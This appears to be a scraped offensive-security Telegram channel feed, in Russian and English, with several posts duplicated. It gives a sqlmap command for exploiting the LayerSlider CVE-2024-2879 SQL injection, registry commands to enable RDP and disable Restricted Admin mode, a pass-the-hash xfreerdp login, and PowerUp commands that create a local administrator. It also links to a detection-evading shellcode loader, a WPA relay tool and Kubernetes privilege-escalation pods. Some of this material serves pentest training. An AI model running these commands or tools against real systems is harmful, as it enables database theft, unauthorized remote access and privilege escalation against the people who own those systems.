Forwarded from Proxy Bar
CVE-2024-2879 LayerSlider плагин для WordPress
*
Версии LayerSlider 7.9.11 - 7.10.0 - Unauthenticated SQL Injection
*
Недостаточне экранирование позволяет добавлять дополнительные SQL-запросы к уже существующим, как итог = можно использовать для извлечения конфиденциальной информации из базы данных.
*
POC usage:
#wordpress
*
Версии LayerSlider 7.9.11 - 7.10.0 - Unauthenticated SQL Injection
*
Недостаточне экранирование позволяет добавлять дополнительные SQL-запросы к уже существующим, как итог = можно использовать для извлечения конфиденциальной информации из базы данных.
*
POC usage:
sqlmap "https:://OLOLO.com/wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=" --risk=3 --level=4 --dbms=mysql --technique=T or sqlmap -r request.txt --risk=3 --level=4 --dbms=mysql --technique=T#wordpress
Forwarded from Threat Hunt
#maldev #redteam
Инструмент для имитации поведения AV/EDR. Утилита позволяет оттачивать навыки обхода средств защиты при создании своих загрузчиков.
1. Собираем проект
2. Создаём файл ioc.json с паттернами шелл-кода
3. Запускаем инструмент, указываем идентификатор вредоносного процесса:
https://github.com/Helixo32/CrimsonEDR
Инструмент для имитации поведения AV/EDR. Утилита позволяет оттачивать навыки обхода средств защиты при создании своих загрузчиков.
1. Собираем проект
./compile.sh2. Создаём файл ioc.json с паттернами шелл-кода
3. Запускаем инструмент, указываем идентификатор вредоносного процесса:
.\CrimsonEDRPanel.exe -d C:\Temp\CrimsonEDR.dll -p 1234https://github.com/Helixo32/CrimsonEDR
GitHub
GitHub - Helixo32/CrimsonEDR: Simulate the behavior of AV/EDR for malware development training.
Simulate the behavior of AV/EDR for malware development training. - Helixo32/CrimsonEDR
Prototype pollution
Utils
List of known gadget
Utils
* PPScan - Client Side Protype pollution Scanner
* fingerprint.js - noscript for finding gadgets
* untrusted-types - Chrome extension that abuses Trusted Types to log DOMXSS sinks
* pollute.js - simple tool to make it easier to exploit prototype pollution
List of known gadget
* Link - examples of libraries that are vulnerable to Prototype Pollution
* Link - payloads for known libraries
WPA_Sycophant
A tool to relay phase 2 authentication attempts to access corporate wireless without cracking the password.
#wifi
A tool to relay phase 2 authentication attempts to access corporate wireless without cracking the password.
#wifi
GitHub
GitHub - sensepost/wpa_sycophant: Evil client portion of EAP relay attack
Evil client portion of EAP relay attack. Contribute to sensepost/wpa_sycophant development by creating an account on GitHub.
🐳1
Kubernetes pentest tools
Krew kubectl plugins - https://krew.sigs.k8s.io/plugins/
* kube-hunter - мощный инструмент от Aqua Security
* kubescape - выявление мисконфигов кластера, RBAC, скан образов
* kdigger - тулза для разведки окружения
* kubeletctl - кастомный клиент для общения с kebelet
* peirates - мульти-комбайн тулза для пентеста кластера, в том числе изнутри pod'а
* BOtB - инструмент для анализа и эксплуатации контейнеров
Krew kubectl plugins - https://krew.sigs.k8s.io/plugins/
🐳1
Provide RDP access
Turn on
Bypass Restricted Admin Mode
Connect
Turn on
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
Bypass Restricted Admin Mode
reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f
Connect
xfreerdp /v:10.10.10.10 /u:username /pth:<NT_HASH> /dynamic-resolution +clipboard
❤1🐳1
PowerUp
PowerUp.ps1 - aims to be a clearinghouse of common Windows privilege escalation vectors that rely on misconfigurations.
Contains abuse modules such as:
e.g:
Display services the current user can modify
PowerUp also provides us an AbuseFunction, which is a built-in function to replace the binary and, if we have sufficient permissions, restart it. The default behavior is to create a new local user called john with the password Password123! and add it to the local Administrators group
#windows #privesc
PowerUp.ps1 - aims to be a clearinghouse of common Windows privilege escalation vectors that rely on misconfigurations.
Contains abuse modules such as:
* Token/Privilege Enumeration
* Service Enumeration
* DLL Hijacking
* Registry Checks
e.g:
Display services the current user can modify
PS C:\Users\dave> Get-ModifiableServiceFile
PowerUp also provides us an AbuseFunction, which is a built-in function to replace the binary and, if we have sufficient permissions, restart it. The default behavior is to create a new local user called john with the password Password123! and add it to the local Administrators group
PS C:\Users\dave> Install-ServiceBinary -Name 'vulnService'
#windows #privesc
🐳1
This PowerShell noscript demonstrates advanced techniques including shellcode injection, dynamic function invocation, and PowerShell noscript obfuscation
Link
Link
GitHub
GitHub - EvilBytecode/Shellcode-Loader: This is way to load a shellcode, and obfuscate it, so it avoids scantime detection.
This is way to load a shellcode, and obfuscate it, so it avoids scantime detection. - EvilBytecode/Shellcode-Loader
🤯4
Windows Local Privilege Escalation Cookbook
Tactics & Techniques for windows privileges escalation with explanations, examples and labs for each case
Link
Tactics & Techniques for windows privileges escalation with explanations, examples and labs for each case
Link
GitHub
GitHub - nickvourd/Windows-Local-Privilege-Escalation-Cookbook: Windows Local Privilege Escalation Cookbook
Windows Local Privilege Escalation Cookbook. Contribute to nickvourd/Windows-Local-Privilege-Escalation-Cookbook development by creating an account on GitHub.
❤3
A collection of manifests that create pods with different elevated privileges.
Quickly demonstrate the impact of allowing security sensitive pod attributes like
#kubernetes
Quickly demonstrate the impact of allowing security sensitive pod attributes like
* hostNetwork
* hostPID
* hostPath
* hostIPC
* privileged
#kubernetes
GitHub
GitHub - BishopFox/badPods: A collection of manifests that will create pods with elevated privileges.
A collection of manifests that will create pods with elevated privileges. - BishopFox/badPods
❤3
pspy - unprivileged Linux process snooping
It allows you to see commands run by other users, cron jobs, etc. as they execute.
The tool gathers the info from procfs scans. Inotify watchers placed on selected parts of the file system trigger these scans to catch short-lived processes.
Link
It allows you to see commands run by other users, cron jobs, etc. as they execute.
The tool gathers the info from procfs scans. Inotify watchers placed on selected parts of the file system trigger these scans to catch short-lived processes.
Also great to demonstrate why passing secrets as arguments on the command line is a bad idea.
Link
GitHub
GitHub - DominicBreuker/pspy: Monitor linux processes without root permissions
Monitor linux processes without root permissions. Contribute to DominicBreuker/pspy development by creating an account on GitHub.
❤3🐳1
Инструменты для изучения безопасности kubernetes
Обзор на simulator - Link
#kubernetes
* simulator (with AWS)
* kube_security_lab (On-premise)
Обзор на simulator - Link
#kubernetes
GitHub
GitHub - controlplaneio/simulator: Kubernetes Security Training Platform - focusing on security mitigation
Kubernetes Security Training Platform - focusing on security mitigation - controlplaneio/simulator
❤4
Multi Tool Kubernetes Pentest Image
This docker image by Luntry contains all the most popular and necessary tools for Kubernetes penetration testing
Inside:
#kubernetes
This docker image by Luntry contains all the most popular and necessary tools for Kubernetes penetration testing
Inside:
* Shell via web
* common tools for kube pentest
* Bypass read-only container file system
* Bypass signature engine
#kubernetes
GitHub
GitHub - r0binak/MTKPI: 🧰 Multi Tool Kubernetes Pentest Image
🧰 Multi Tool Kubernetes Pentest Image . Contribute to r0binak/MTKPI development by creating an account on GitHub.
❤3